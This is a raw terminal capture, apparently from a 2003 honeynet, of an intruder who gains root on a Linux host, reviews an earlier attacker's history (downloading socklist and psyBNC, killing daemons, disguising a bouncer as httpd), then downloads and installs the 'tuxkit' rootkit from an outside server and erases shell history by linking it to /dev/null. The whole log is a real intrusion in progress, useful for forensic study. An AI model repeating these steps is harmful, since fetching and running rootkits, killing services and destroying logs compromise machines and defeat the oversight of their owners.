Tue Feb 25 11:10:10 HKT 2003
================================
Connected to ttyp1 snoop server...
Ctrl+'\' (ASCII 28) to suspend, Ctrl+'-' (ASCII 31) to terminate.
sudo -u root /bin/sh
Password:
sh-2.04# ls -al
total 32
drwx------ 2 mssql 504 4096 Feb 24 11:56 .
drwxr-xr-x 12 root root 4096 Feb 24 11:42 ..
-rw------- 1 root root 17 Feb 24 11:56 .bash_history
-rw-r--r-- 1 mssql 504 24 Feb 22 04:57 .bash_logout
-rw-r--r-- 1 mssql 504 224 Feb 22 04:57 .bash_profile
-rw-r--r-- 1 mssql 504 124 Feb 22 04:57 .bashrc
-rw-r--r-- 1 mssql 504 747 Feb 22 04:57 .emacs
-rw-r--r-- 1 mssql 504 3728 Feb 22 04:57 .screenrc
sh-2.04# w
11:10am up 3 days, 20:49, 1 user, load average: 0.29, 0.06, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
mssql pts/2 astound-64-85-22 11:10am 0.00s 0.04s 0.02s -bash
sh-2.04# pwd
/home/mssql
sh-2.04# ls -al
total 32
drwx------ 2 mssql 504 4096 Feb 24 11:56 .
drwxr-xr-x 12 root root 4096 Feb 24 11:42 ..
-rw------- 1 root root 17 Feb 24 11:56 .bash_history
-rw-r--r-- 1 mssql 504 24 Feb 22 04:57 .bash_logout
-rw-r--r-- 1 mssql 504 224 Feb 22 04:57 .bash_profile
-rw-r--r-- 1 mssql 504 124 Feb 22 04:57 .bashrc
-rw-r--r-- 1 mssql 504 747 Feb 22 04:57 .emacs
-rw-r--r-- 1 mssql 504 3728 Feb 22 04:57 .screenrc
sh-2.04# cd
sh-2.04# su
c�]0;root@pc88: /home/mssql�[root@pc88 mssql]# cd
�]0;root@pc88: /root�[root@pc88 /root]# ls -al
total 212
drwxr-x--- 5 root root 4096 Feb 24 12:31 �[01;34m.�[00m
drwxr-xr-x 19 root root 4096 Feb 22 22:38 �[01;34m..�[00m
-rw-r--r-- 1 root root 1126 Aug 24 1995 �[00m.Xresources�[00m
-rw-r--r-- 1 root root 0 Feb 12 20:14 �[00m.addressbook�[00m
-rw------- 1 root root 2285 Feb 12 20:14 �[00m.addressbook.lu�[00m
-rw------- 1 root root 345 Feb 25 03:59 �[00m.bash_history�[00m
-rw-r--r-- 1 root root 24 Jun 11 2000 �[00m.bash_logout�[00m
-rw-r--r-- 1 root root 312 Feb 24 11:52 �[00m.bash_profile�[00m
-rw-r--r-- 1 root root 176 Aug 24 1995 �[00m.bashrc�[00m
-rw-r--r-- 1 root root 210 Jun 11 2000 �[00m.cshrc�[00m
-rw------- 1 root root 377 Feb 12 20:25 �[00m.pine-interrupted-mail�[00m
-rw------- 1 root root 14532 Feb 12 20:11 �[00m.pinerc�[00m
drwxr-xr-x 2 root root 4096 Dec 4 01:02 �[01;34m.ssh�[00m
-rw-r--r-- 1 root root 215 Oct 24 18:06 �[00m.tcshrc�[00m
-rw------- 1 root root 135168 Feb 23 01:30 �[00mcore�[00m
drwxr-xr-x 2 root root 4096 Dec 11 12:20 �[01;34mlog�[00m
drwx------ 2 root root 4096 Feb 12 20:11 �[01;34mmail�[00m
-rw-r--r-- 1 root root 5 Feb 14 09:30 �[00mx.pid�[00m
�]0;root@pc88: /root�[root@pc88 /root]# cat .bash_history
mail
exit
w
cd /usr/bin/.tux/tools
./socklist
ls
cd utils
wget www.[--delete--].us/socklist.tgz
tar xzvf socklist.tgz
./socklist
killall -9 -vq ntpd
killall -9 -vq identd smbd atd
./socklist
kill -9 1187
./socklist
wget www.[--delete--].us/psycompiled.tgz
tar xzvf psycompiled.tgz
cd psybnc
pico psybnc.conf
mv ./psybnc httpd
export PATH="."
httpd
�]0;root@pc88: /root�[root@pc88 /root]# ls -al
total 212
drwxr-x--- 5 root root 4096 Feb 24 12:31 �[01;34m.�[00m
drwxr-xr-x 19 root root 4096 Feb 22 22:38 �[01;34m..�[00m
-rw-r--r-- 1 root root 1126 Aug 24 1995 �[00m.Xresources�[00m
-rw-r--r-- 1 root root 0 Feb 12 20:14 �[00m.addressbook�[00m
-rw------- 1 root root 2285 Feb 12 20:14 �[00m.addressbook.lu�[00m
-rw------- 1 root root 345 Feb 25 03:59 �[00m.bash_history�[00m
-rw-r--r-- 1 root root 24 Jun 11 2000 �[00m.bash_logout�[00m
-rw-r--r-- 1 root root 312 Feb 24 11:52 �[00m.bash_profile�[00m
-rw-r--r-- 1 root root 176 Aug 24 1995 �[00m.bashrc�[00m
-rw-r--r-- 1 root root 210 Jun 11 2000 �[00m.cshrc�[00m
-rw------- 1 root root 377 Feb 12 20:25 �[00m.pine-interrupted-mail�[00m
-rw------- 1 root root 14532 Feb 12 20:11 �[00m.pinerc�[00m
drwxr-xr-x 2 root root 4096 Dec 4 01:02 �[01;34m.ssh�[00m
-rw-r--r-- 1 root root 215 Oct 24 18:06 �[00m.tcshrc�[00m
-rw------- 1 root root 135168 Feb 23 01:30 �[00mcore�[00m
drwxr-xr-x 2 root root 4096 Dec 11 12:20 �[01;34mlog�[00m
drwx------ 2 root root 4096 Feb 12 20:11 �[01;34mmail�[00m
-rw-r--r-- 1 root root 5 Feb 14 09:30 �[00mx.pid�[00m
�]0;root@pc88: /root�[root@pc88 /root]#
�]0;root@pc88: /root�[root@pc88 /root]# touch IS_THIS_A_HONEYNET_?
�]0;root@pc88: /root�[root@pc88 /root]# ls -al
total 212
drwxr-x--- 5 root root 4096 Feb 25 11:11 �[01;34m.�[00m
drwxr-xr-x 19 root root 4096 Feb 22 22:38 �[01;34m..�[00m
-rw-r--r-- 1 root root 1126 Aug 24 1995 �[00m.Xresources�[00m
-rw-r--r-- 1 root root 0 Feb 12 20:14 �[00m.addressbook�[00m
-rw------- 1 root root 2285 Feb 12 20:14 �[00m.addressbook.lu�[00m
-rw------- 1 root root 345 Feb 25 03:59 �[00m.bash_history�[00m
-rw-r--r-- 1 root root 24 Jun 11 2000 �[00m.bash_logout�[00m
-rw-r--r-- 1 root root 312 Feb 24 11:52 �[00m.bash_profile�[00m
-rw-r--r-- 1 root root 176 Aug 24 1995 �[00m.bashrc�[00m
-rw-r--r-- 1 root root 210 Jun 11 2000 �[00m.cshrc�[00m
-rw------- 1 root root 377 Feb 12 20:25 �[00m.pine-interrupted-mail�[00m
-rw------- 1 root root 14532 Feb 12 20:11 �[00m.pinerc�[00m
drwxr-xr-x 2 root root 4096 Dec 4 01:02 �[01;34m.ssh�[00m
-rw-r--r-- 1 root root 215 Oct 24 18:06 �[00m.tcshrc�[00m
-rw-r--r-- 1 root root 0 Feb 25 11:11 �[00mIS_THIS_A_HONEYNET_?�[00m
-rw------- 1 root root 135168 Feb 23 01:30 �[00mcore�[00m
drwxr-xr-x 2 root root 4096 Dec 11 12:20 �[01;34mlog�[00m
drwx------ 2 root root 4096 Feb 12 20:11 �[01;34mmail�[00m
-rw-r--r-- 1 root root 5 Feb 14 09:30 �[00mx.pid�[00m
�]0;root@pc88: /root�[root@pc88 /root]# netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 192.168.20.1:22 192.168.20.254:36159 ESTABLISHED
tcp 0 0 192.168.20.1:12241 200.75.194.145:1792 ESTABLISHED
tcp 0 0 192.168.20.1:3983 192.168.20.254:2811 ESTABLISHED
tcp 0 0 192.168.20.1:3984 192.168.20.254:2812 ESTABLISHED
tcp 0 142 192.168.20.1:23 64.85.226.218:2613 ESTABLISHED
tcp 0 0 192.168.20.1:22 192.168.20.254:36160 ESTABLISHED
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:6011 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:6010 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:12241 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:1607 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:1030 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:513 0.0.0.0:* LISTEN
udp 0 0 0.0.0.0:767 0.0.0.0:*
udp 0 0 0.0.0.0:3049 0.0.0.0:*
udp 0 0 0.0.0.0:69 0.0.0.0:*
udp 0 0 0.0.0.0:514 0.0.0.0:*
udp 0 0 0.0.0.0:1024 0.0.0.0:*
Active UNIX domain sockets (including servers)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ] STREAM CONNECTED 359
unix 2 [ ] DGRAM 900
unix 2 [ ] DGRAM 1042
unix 2 [ ] DGRAM 1088
unix 2 [ ] DGRAM 1278
unix 2 [ ] DGRAM 1328
unix 2 [ ] DGRAM 10916806
unix 2 [ ] DGRAM 10936342
unix 2 [ ] DGRAM 10938093
unix 2 [ ] DGRAM 10938101
unix 3 [ ] STREAM CONNECTED 10938110
unix 3 [ ] STREAM CONNECTED 10938111
unix 3 [ ] STREAM CONNECTED 10938112
unix 3 [ ] STREAM CONNECTED 10938113
unix 3 [ ] STREAM CONNECTED 10938162
unix 32 [ ] STREAM CONNECTED 10938163 /dev/usb/core/
unix 2 [ ] DGRAM 10939601
unix 3 [ ] STREAM CONNECTED 10939654
unix 3 [ ] STREAM CONNECTED 10939655
unix 3 [ ] STREAM CONNECTED 10939656
unix 3 [ ] STREAM CONNECTED 10939657
unix 3 [ ] STREAM CONNECTED 10939705
unix 31 [ ] STREAM CONNECTED 10939706 /dev/usb/core/
unix 2 [ ACC ] STREAM LISTENING 1305 /dev/gpmctl
unix 7 [ ] DGRAM 10916778 /dev/log
unix 2 [ ACC ] STREAM LISTENING 10939597 /dev/usb/core/
unix 2 [ ACC ] STREAM LISTENING 10938098 /dev/usb/core/
�]0;root@pc88: /root�[root@pc88 /root]# w
11:13am up 3 days, 20:52, 1 user, load average: 1.89, 0.97, 0.38
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
mssql pts/2 astound-64-85-22 11:10am 0.00s 0.05s 0.03s -bash
�]0;root@pc88: /root�[root@pc88 /root]# ps -aux
USER PID %CPU %MEM SIZE RSS TTY STAT START TIME COMMAND
apache 12049 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12050 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12051 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12052 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12053 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12054 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12055 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12056 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12057 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12058 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12059 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12060 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12061 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12388 0.0 0.4 1368 308 ? T 09:26 0:00 mv a mysql
apache 12389 0.0 0.0 0 0 ? Z 09:26 0:00 [mv ]
apache 12395 0.0 1.7 2304 1116 ? S 09:26 0:00 ./mysql
apache 31441 0.0 8.2 12864 5128 ? S Feb 22 0:00 /usr/sbin/httpd -DHAV
apache 31442 0.0 8.2 12864 5152 ? S Feb 22 0:00 /usr/sbin/httpd -DHAV
apache 31443 0.0 8.2 12864 5152 ? S Feb 22 0:00 /usr/sbin/httpd -DHAV
apache 31444 0.0 8.2 12864 5140 ? S Feb 22 0:00 /usr/sbin/httpd -DHAV
apache 31445 0.0 8.2 12864 5108 ? S Feb 22 0:00 /usr/sbin/httpd -DHAV
apache 31446 0.0 8.1 12844 5044 ? S Feb 22 0:00 /usr/sbin/httpd -DHAV
apache 31447 0.0 8.2 12864 5156 ? S Feb 22 0:00 /usr/sbin/httpd -DHAV
mssql 13051 0.0 1.8 2164 1160 p1 S 11:10 0:00 /bin/bash
root 1 0.0 0.1 1368 72 ? S Feb 21 0:05 init [3]
root 2 0.0 0.0 0 0 ? SW Feb 21 0:00 [keventd]
root 3 0.0 0.0 0 0 ? SW Feb 21 0:00 [kapm-idled]
root 5 0.0 0.0 0 0 ? SW Feb 21 0:00 [kreclaimd]
root 6 0.0 0.0 0 0 ? SW Feb 21 0:00 [bdflush]
root 7 0.0 0.0 0 0 ? SW Feb 21 0:00 [kupdated]
root 8 0.0 0.0 0 0 ? SW]
root 10354 0.0 1.9 2464 1224 ? S 03:59 0:00 httpd
root 10367 0.0 0.9 1568 596 ? S 04:02 0:00 CROND
root 10368 0.0 1.4 1924 912 ? S 04:02 0:00 /bin/bash /usr/bin/ru
root 10371 0.0 0.5 1644 344 ? T 04:02 0:00 awk -v progname=/etc/
root 10373 0.0 0.0 0 0 ? Z 04:02 0:00 [awk ]
root 10378 0.0 0.5 1644 344 ? T 04:02 0:00 awk -v progname=/etc/
root 10380 0.0 0.0 0 0 ? Z 04:02 0:00 [awk ]
root 10387 0.0 0.5 1644 344 ? T 04:02 0:00 awk -v progname=/etc/
root 10389 0.0 0.0 0 0 ? Z 04:02 0:00 [awk ]
root 10390 0.0 3.3 5204 2080 ? S 04:02 0:00 /usr/sbin/sendmail -F
root 10391 0.0 1.3 1904 868 ? S 04:02 0:00 /bin/bash /etc/cron.d
root 10392 0.0 0.8 1656 556 ? S 04:02 0:00 awk -v progname=/etc/
root 10394 0.0 0.4 1348 304 ? T 04:02 0:00 touch /var/lock/makew
root 10395 0.0 0.5 1644 344 ? T 04:02 0:00 awk -v progname=/etc/
root 10396 0.0 1.4 1924 904 ? S 04:02 0:00 /bin/sh /usr/sbin/mak
root 10397 0.0 0.0 0 0 ? Z 04:02 0:00 [touch ]
root 10398 0.0 0.0 0 0 ? Z 04:02 0:00 [awk ]
root 10404 0.0 0.4 1328 300 ? T 04:02 0:00 mktemp /var/tmp/tmpwh
root 10405 0.0 0.0 0 0 ? Z 04:02 0:00 [mktemp ]
root 12999 0.0 1.0 1444 676 ? S 11:02 0:00 syslogd -m 0
root 13011 0.0 1.7 1920 1088 ? S 11:02 0:00 klogd -2
root 13045 0.0 1.3 1720 836 ? S 11:10 0:00 in.telnetd: astound-6
root 13047 0.0 2.1 2412 1312 ? S 11:10 0:00 login -- mssql
root 13050 0.0 0.8 1540 524 ? S 11:10 0:00 -bash
root 13052 0.0 2.4 3320 1544 ? S 11:10 0:00 /bin/data_mining
root 13076 54.8 0.6 1520 400 ? R 11:10 1:59 /bin/mingetty ttyp1
root 13077 0.0 1.0 1972 672 ? S 11:10 0:00 /bin/number_cum -w 1
root 13081 0.0 1.8 2160 1160 p1 S 11:10 0:00 /bin/sh
root 13090 0.0 1.4 2072 932 p1 S 11:10 0:00 su
root 13092 0.0 2.3 2840 1480 p1 S 11:10 0:00 -csh
root 13109 0.0 0.8 1540 524 p1 S 11:10 0:00 /sbin/bash
root 13110 0.0 2.1 2388 1332 p2 S 11:10 0:00 /bin/bash
root 13143 0.0 2.5 3320 1564 ? S 11:10 0:00 /bin/data_mining
root 13167 50.1 0.6 1520 400 ? R 11:10 1:37 /bin/mingetty ttyp2
root 13168 0.0 1.0 1972 672 ? S 11:10 0:00 /bin/number_cum -w 1
root 13196 0.0 1.1 1472 696 p2 R 11:13 0:00 ps -aux
root 13197 0.0 0.4 1364 308 p2 R 11:13 0:00 ps -aux
root 13198 0.0 0.4 1364 308 p2 R 11:13 0:00 ps -aux
root 13199 0.0 0.5 1420 316 p2 R 11:13 0:00 /sbin/modprobe -s -k
root 13200 0.0 0.5 1420 316 p2 R 11:13 0:00 /sbin/modprobe -s -k
rpcuser 591 0.0 0.4 1568 264 ? S Feb 21 0:00 rpc.statd
�]0;root@pc88: /root�[root@pc88 /root]# ping yahoo.com
PING yahoo.com (64.58.79.230) from 192.168.20.1 : 56(84) bytes of data.
64 bytes from w1.rc.vip.dcx.yahoo.com (64.58.79.230): icmp_seq=0 ttl=237 time=294.240 msec
64 bytes from w1.rc.vip.dcx.yahoo.com (64.58.79.230): icmp_seq=1 ttl=237 time=298.471 msec
--- yahoo.com ping statistics ---
3 packets transmitted, 2 packets received, 33% packet loss
round-trip min/avg/max/mdev = 294.240/296.355/298.471/2.184 ms
�]0;root@pc88: /root�[root@pc88 /root]# 208.235.198.251
bash: 208.235.198.251: command not found
�]0;root@pc88: /root�[root@pc88 /root]# wget 192.[--delete--].170/~bb02/images/gif/tuxkit.tgz
--11:14:17-- http://192.[--delete--].170/%7Ebb02/images/gif/tuxkit.tgz
=> `tuxkit.tgz'
Connecting to 192.[--delete--].170:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 2,624,445 [application/x-tar]
0K -> .......... .......... .......... .......... .......... [ 1%]
50K -> .......... .......... .......... .......... .......... [ 3%]
100K -> .......... .......... .......... .......... .......... [ 5%]
150K -> .......... .......... .......... .......... .......... [ 7%]
200K -> .......... .......... .......... .......... .......... [ 9%]
250K -> .......... .......... .......... .......... .......... [ 11%]
300K -> .......... .......... .......... .......... .......... [ 13%]
350K -> .......... .......... .......... .......... .......... [ 15%]
400K -> .......... .......... .......... .......... .......... [ 17%]
450K -> .......... .......... .......... .......... .......... [ 19%]
500K -> .......... .......... .......... .......... .......... [ 21%]
550K -> .......... .......... .......... .......... .......... [ 23%]
600K -> .......... .......... .......... .......... .......... [ 25%]
650K -> .......... .......... .......... .......... .......... [ 27%]
700K -> .......... .......... .......... .......... .......... [ 29%]
750K -> .......... .......... .......... .......... .......... [ 31%]
800K -> .......... .......... .......... .......... .......... [ 33%]
850K -> .......... .......... .......... .......... .......... [ 35%]
900K -> .......... .......... .......... .......... .......... [ 37%]
950K -> .......... .......... .......... .......... .......... [ 39%]
1000K -> .......... .......... .......... .......... .......... [ 40%]
1050K -> .......... .......... .......... .......... .......... [ 42%]
1100K -> .......... .......... .......... .......... .......... [ 44%]
1150K -> .......... .......... .......... .......... .......... [ 46%]
1200K -> .......... .......... .......... .......... .......... [ 48%]
1250K -> .......... .......... .......... .......... .......... [ 50%]
1300K -> .......... .......... .......... .......... .......... [ 52%]
1350K -> .......... .......... .......... .......... .......... [ 54%]
1400K -> .......... .......... .......... .......... .......... [ 56%]
1450K -> .......... .......... .......... .......... .......... [ 58%]
1500K -> .......... .......... .......... .......... .......... [ 60%]
1550K -> .......... .......... .......... .......... .......... [ 62%]
1600K -> .......... .......... .......... .......... .......... [ 64%]
1650K -> .......... .......... .......... .......... .......... [ 66%]
1700K -> .......... .......... .......... .......... .......... [ 68%]
1750K -> .......... .......... .......... .......... .......... [ 70%]
1800K -> .......... .......... .......... .......... .......... [ 72%]
1850K -> .......... .......... .......... .......... .......... [ 74%]
1900K -> .......... .......... .......... .......... .......... [ 76%]
1950K -> .......... .......... .......... .......... .......... [ 78%]
2000K -> .......... .......... .......... .......... .......... [ 79%]
2050K -> .......... .......... .......... .......... .......... [ 81%]
2100K -> .......... .......... .......... .......... .......... [ 83%]
2150K -> .......... .......... .......... .......... .......... [ 85%]
2200K -> .......... .......... .......... .......... .......... [ 87%]
2250K -> .......... .......... .......... .......... .......... [ 89%]
2300K -> .......... .......... .......... .......... .......... [ 91%]
2350K -> .......... .......... .......... .......... .......... [ 93%]
2400K -> .......... .......... .......... .......... .......... [ 95%]
2450K -> .......... .......... .......... .......... .......... [ 97%]
2500K -> .......... .......... .......... .......... .......... [ 99%]
2550K -> .......... .. [100%]
11:15:06 (52.57 KB/s) - `tuxkit.tgz' saved [2624445/2624445]
�]0;root@pc88: /root�[root@pc88 /root]# tar -zxvf tux*
tuxkit/
tuxkit/bin.tgz
tuxkit/cfg.tgz
tuxkit/lib.tgz
tuxkit/sshd.tgz
tuxkit/tools.tgz
tuxkit/tuxkit
�]0;root@pc88: /root�[root@pc88 /root]# ls -al
total 2784
drwxr-x--- 6 root root 4096 Feb 25 11:15 �[01;34m.�[00m
drwxr-xr-x 19 root root 4096 Feb 22 22:38 �[01;34m..�[00m
-rw-r--r-- 1 root root 1126 Aug 24 1995 �[00m.Xresources�[00m
-rw-r--r-- 1 root root 0 Feb 12 20:14 �[00m.addressbook�[00m
-rw------- 1 root root 2285 Feb 12 20:14 �[00m.addressbook.lu�[00m
-rw------- 1 root root 345 Feb 25 03:59 �[00m.bash_history�[00m
-rw-r--r-- 1 root root 24 Jun 11 2000 �[00m.bash_logout�[00m
-rw-r--r-- 1 root root 312 Feb 24 11:52 �[00m.bash_profile�[00m
-rw-r--r-- 1 root root 176 Aug 24 1995 �[00m.bashrc�[00m
-rw-r--r-- 1 root root 210 Jun 11 2000 �[00m.cshrc�[00m
-rw------- 1 root root 377 Feb 12 20:25 �[00m.pine-interrupted-mail�[00m
-rw------- 1 root root 14532 Feb 12 20:11 �[00m.pinerc�[00m
drwxr-xr-x 2 root root 4096 Dec 4 01:02 �[01;34m.ssh�[00m
-rw-r--r-- 1 root root 215 Oct 24 18:06 �[00m.tcshrc�[00m
-rw-r--r-- 1 root root 0 Feb 25 11:11 �[00mIS_THIS_A_HONEYNET_?�[00m
-rw------- 1 root root 135168 Feb 23 01:30 �[00mcore�[00m
drwxr-xr-x 2 root root 4096 Dec 11 12:20 �[01;34mlog�[00m
drwx------ 2 root root 4096 Feb 12 20:11 �[01;34mmail�[00m
drwxr-xr-x 2 933 cheerie 4096 Feb 25 10:17 �[01;34mtuxkit�[00m
-rw-r--r-- 1 root root 2624445 Feb 25 10:05 �[01;31mtuxkit.tgz�[00m
-rw-r--r-- 1 root root 5 Feb 14 09:30 �[00mx.pid�[00m
�]0;root@pc88: /root�[root@pc88 /root]# rm -rf .bash_history ; ln -s /dev/null .bash_history
�]0;root@pc88: /root�[root@pc88 /root]# ls =-al
ls: =-al: No such file or directory
�]0;root@pc88: /root�[root@pc88 /root]# ls -al
total 2780
drwxr-x--- 6 root root 4096 Feb 25 11:15 �[01;34m.�[00m
drwxr-xr-x 19 root root 4096 Feb 22 22:38 �[01;34m..�[00m
-rw-r--r-- 1 root root 1126 Aug 24 1995 �[00m.Xresources�[00m
-rw-r--r-- 1 root root 0 Feb 12 20:14 �[00m.addressbook�[00m
-rw------- 1 root root 2285 Feb 12 20:14 �[00m.addressbook.lu�[00m
lrwxrwxrwx 1 root root 9 Feb 25 11:15 �[01;05;37;41m.bash_history�[00m -> �[01;05;37;41m/dev/null�[00m
-rw-r--r-- 1 root root 24 Jun 11 2000 �[00m.bash_logout�[00m
-rw-r--r-- 1 root root 312 Feb 24 11:52 �[00m.bash_profile�[00m
-rw-r--r-- 1 root root 176 Aug 24 1995 �[00m.bashrc�[00m
-rw-r--r-- 1 root root 210 Jun 11 2000 �[00m.cshrc�[00m
-rw------- 1 root root 377 Feb 12 20:25 �[00m.pine-interrupted-mail�[00m
-rw------- 1 root root 14532 Feb 12 20:11 �[00m.pinerc�[00m
drwxr-xr-x 2 root root 4096 Dec 4 01:02 �[01;34m.ssh�[00m
-rw-r--r-- 1 root root 215 Oct 24 18:06 �[00m.tcshrc�[00m
-rw-r--r-- 1 root root 0 Feb 25 11:11 �[00mIS_THIS_A_HONEYNET_?�[00m
-rw------- 1 root root 135168 Feb 23 01:30 �[00mcore�[00m
drwxr-xr-x 2 root root 4096 Dec 11 12:20 �[01;34mlog�[00m
drwx------ 2 root root 4096 Feb 12 20:11 �[01;34mmail�[00m
drwxr-xr-x 2 933 cheerie 4096 Feb 25 10:17 �[01;34mtuxkit�[00m
-rw-r--r-- 1 root root 2624445 Feb 25 10:05 �[01;31mtuxkit.tgz�[00m
-rw-r--r-- 1 root root 5 Feb 14 09:30 �[00mx.pid�[00m
�]0;root@pc88: /root�[root@pc88 /root]# cat *pid
1218
�]0;root@pc88: /root�[root@pc88 /root]# rm -rf *z
�]0;root@pc88: /root�[root@pc88 /root]# cd tux*
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# ./setup kewlako 3432 8008���������
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# ./setup k3wlm3 3432 8008
bash: ./setup: No such file or directory
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# ./tuxkit k3wlm3 3432 8008
�]0;root@pc88: /root/tuxkit�[root@pc88 tuxkit]# ps -aux
USER PID %CPU %MEM SIZE RSS TTY STAT START TIME COMMAND
apache 12049 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12050 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12051 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12052 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12053 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12054 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12055 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12056 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12057 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12058 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12059 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12060 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12061 0.0 9.1 12844 5684 ? S 09:12 0:00 /usr/sbin/httpd -DHAV
apache 12388 0.0 0.4 1368 308 ? T 09:26 0:00 mv a mysql
apache 12389 0.0 0.0 0 0 ? Z 09:26 0:00 [mv ]
apache 12395 0.0 1.7 2304 1116 ? S 09:26 0:00 ./mysql
apache 31441 0.0 8.2 12864 5128 ? S Feb 22 0:00 /usr/sbin/httpd -DHAV
apache 31442 0.0 8.2 12864 5152 ? S Feb 22 0:00 /usr/sbin/httpd -DHAV
apache 31443 0.0 8.2 12864 5152 ? S Feb 22 0:00 /usr/sbin/httpd -DHAV
apache 31444 0.0 8.2 12864 5140 ? S Feb 22 0:00 /usr/sbin/httpd -DHAV
apache 31445 0.0 8.2 12864 5108 ? S Feb 22 0:00 /usr/sbin/httpd -DHAV
apache 31446 0.0 8.1 12844 5044 ? S Feb 22 0:00 /usr/sbin/httpd -DHAV
apache 31447 0.0 8.2 12864 5156 ? S Feb 22 0:00 /usr/sbin/httpd -DHAV
mssql 13051 0.0 1.8 2164 1160 p1 S 11:10 0:00 /bin/bash
root 1 0.0 0.1 1368 72 ? S Feb 21 0:05 init [3]
root 2 0.0 0.0 0 0 ? SW Feb 21 0:00 [keventd]
root 3 0.0 0.0 0 0 ? SW Feb 21 0:00 [kapm-idled]
root 5 0.0 0.0 0 0 ? SW Feb 21 0:00 [kreclaimd]
root 6 0.0 0.0 0 0 ? SW Feb 21 0:00 [bdflush]
root 7 0.0 0.0 0 0 ? SW Feb 21 0:00 [kupdated]
root 8 0.0 0.0 0 0 ? SW]
root 10354 0.0 1.9 2464 1224 ? S 04:00 0:00 httpd
root 10367 0.0 0.9 1568 596 ? S 04:02 0:00 CROND
root 10368 0.0 1.4 1924 912 ? S 04:02 0:00 /bin/bash /usr/bin/ru
root 10371 0.0 0.5 1644 344 ? T 04:02 0:00 awk -v progname=/etc/
root 10373 0.0 0.0 0 0 ? Z 04:02 0:00 [awk ]
root 10378 0.0 0.5 1644 344 ? T 04:02 0:00 awk -v progname=/etc/
root 10380 0.0 0.0 0 0 ? Z 04:02 0:00 [awk ]
root 10387 0.0 0.5 1644 344 ? T 04:02 0:00 awk -v progname=/etc/
root 10389 0.0 0.0 0 0 ? Z 04:02 0:00 [awk ]
root 10390 0.0 3.3 5204 2080 ? S 04:02 0:00 /usr/sbin/sendmail -F
root 10391 0.0 1.3 1904 868 ? S 04:02 0:00 /bin/bash /etc/cron.d
root 10392 0.0 0.8 1656 556 ? S 04:02 0:00 awk -v progname=/etc/
root 10394 0.0 0.4 1348 304 ? T 04:02 0:00 touch /var/lock/makew
root 10395 0.0 0.5 1644 344 ? T 04:02 0:00 awk -v progname=/etc/
root 10396 0.0 1.4 1924 904 ? S 04:02 0:00 /bin/sh /usr/sbin/mak
root 10397 0.0 0.0 0 0 ? Z 04:02 0:00 [touch ]
root 10398 0.0 0.0 0 0 ? Z 04:02 0:00 [awk ]
root 10404 0.0 0.4 1328 300 ? T 04:02 0:00 mktemp /var/tmp/tmpwh
root 10405 0.0 0.0 0 0 ? Z 04:02 0:00 [mktemp ]
root 12999 0.0 1.0 1444 676 ? S 11:02 0:00 syslogd -m 0
root 13011 0.0 1.7 1920 1088 ? S 11:02 0:00 klogd -2
root 13045 0.0 1.3 1720 836 ? S 11:10 0:00 in.telnetd: astound-6
root 13047 0.0 2.1 2412 1312 ? S 11:10 0:00 login -- mssql
root 13050 0.0 0.8 1540 524 ? S 11:10 0:00 -bash
